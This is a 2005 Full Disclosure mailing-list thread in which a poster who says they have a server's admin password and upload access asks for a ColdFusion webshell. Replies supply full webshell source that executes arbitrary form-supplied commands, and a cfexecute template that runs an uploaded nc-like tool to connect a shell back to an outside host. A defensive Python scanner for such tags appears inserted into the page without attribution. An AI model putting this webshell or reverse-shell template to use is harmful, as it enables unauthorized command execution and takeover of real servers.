Full Disclosure mailing list archives
Re: coldfusion pentest
From: "fatb" <fatb () security zz ha cn>
Date: Tue, 10 May 2005 17:12:00 +0800
thx :)
the script from securiteam was from Kurt Grutzmacher originally, it could not run in my box
and I successfully got a working shell by uploading a nc-like tool and using the following script to run it

<html>
<body>
<cfexecute name="D:\haha.exe" arguments="-connect 1.1.1. 9999" timeout="20">
</cfexecute>
</body>
</html>

no matter how, I thought many guys who, like me, need a working cf webshell, because the upload script does not allow us to upload exe or some other kinds of files

----- Original Message -----
From: "Javier Reoyo" <javier.reoyo () interdominios com>
To: <full-disclosure () lists grok org uk>
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest

Hi fatb, this is from mailing of securiteam. Try it.

ColdFusion Web Shell
------------------------------------------------------------------------

SUMMARY

DETAILS

The following source code will generate a web based shell whenever it is executed under the ColdFusion environment.

Tool source code:

< html>
< body>
< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
< tr>
< td>Command:</td>
< td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td>
</tr>
< tr>
< td>Options:</td>
< td> < input type=text name="opts" size=50 < cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
</tr>
< tr>
< td>Timeout:</td>
< td>< input type=text name="timeout" size=4 < cfif isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5" </cfif> > </td>
</tr>
</table>
< input type=submit value="Exec" >
</FORM>
< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>

ADDITIONAL INFORMATION

The information has been provided by <mailto:grutz () jingojango net> Kurt Grutzmacher.

========================================

----- Original Message -----
From: "fatb" <fatb () security zz ha cn>
To: <pen-test () securityfocus com>
Cc: <full-disclosure () lists grok org uk>
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest

Hi all guys
I've succeeded in getting the admin's passwd of the web interface and I can upload any kinds of files to the server
the server is running coldfusion 4.5 with iis 5.0
but I can not find a coldfusion webshell to continue
anybody could be kind enough to send me a working coldfusion webshell
thx in advance!

--------------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
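A defender-side check for the pattern in both templates quoted in this thread, added here as an example and not part of any poster's message: it finds cfexecute tags in CFML source and marks those whose attributes are filled from client-supplied scopes. The function names, the scope list, the file extensions and the sample strings are assumptions made for the example.

```python
import os
import re

# Opening <cfexecute ...> tag: any case, attributes may span lines, and the
# "< cfexecute" spacing seen in the quoted listing is tolerated.
CFEXECUTE = re.compile(r"<\s*cfexecute\b([^>]*)>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# #form.x#, #url.x#, #cgi.x#, #cookie.x#: values supplied by the HTTP client.
CLIENT_SCOPE = re.compile(r"#\s*(?:form|url|cgi|cookie)\.\w+", re.I)

def scan_template(text):
    """Return one finding per <cfexecute> tag found in CFML source text."""
    findings = []
    for m in CFEXECUTE.finditer(text):
        attrs = {k.lower(): dq or sq or bare
                 for k, dq, sq, bare in ATTR.findall(m.group(1))}
        tainted = sorted(k for k, v in attrs.items() if CLIENT_SCOPE.search(v))
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "name": attrs.get("name", ""),
            "client_controlled": tainted,
            # Request data in the attributes: the caller picks the program.
            "severity": "high" if tainted else "review",
        })
    return findings

def scan_tree(root, exts=(".cfm", ".cfml", ".cfc")):
    """Scan every CFML file under root; returns {path: findings}."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(folder, fn)
                with open(path, encoding="latin-1") as fh:
                    found = scan_template(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed samples modelled on the two templates quoted in the thread.
SAMPLE_FORM_DRIVEN = '''<cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#"
    arguments = "#Form.opts#" timeout = "#Form.timeout#">
</cfexecute></cfsavecontent>'''
SAMPLE_FIXED_PATH = r'<cfexecute name="D:\haha.exe" timeout="20"></cfexecute>'
SAMPLE_BENIGN = "<cfoutput>#DateFormat(Now())#</cfoutput>"

if __name__ == "__main__":
    print(scan_template(SAMPLE_FORM_DRIVEN), scan_template(SAMPLE_FIXED_PATH))
```

Run scan_tree against a copy of the web root and compare the hits with the templates the application is known to ship; a cfexecute tag in a file that arrived through an upload feature is the case this thread describes.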
Current thread:
- coldfusion pentest fatb (May 09)
- Re: coldfusion pentest Kurt Grutzmacher (May 09)
- Re: coldfusion pentest Frederic Charpentier (May 10)
- Re: coldfusion pentest Javier Reoyo (May 10)
- Re: coldfusion pentest fatb (May 10)
- Re: coldfusion pentest fatb (May 10)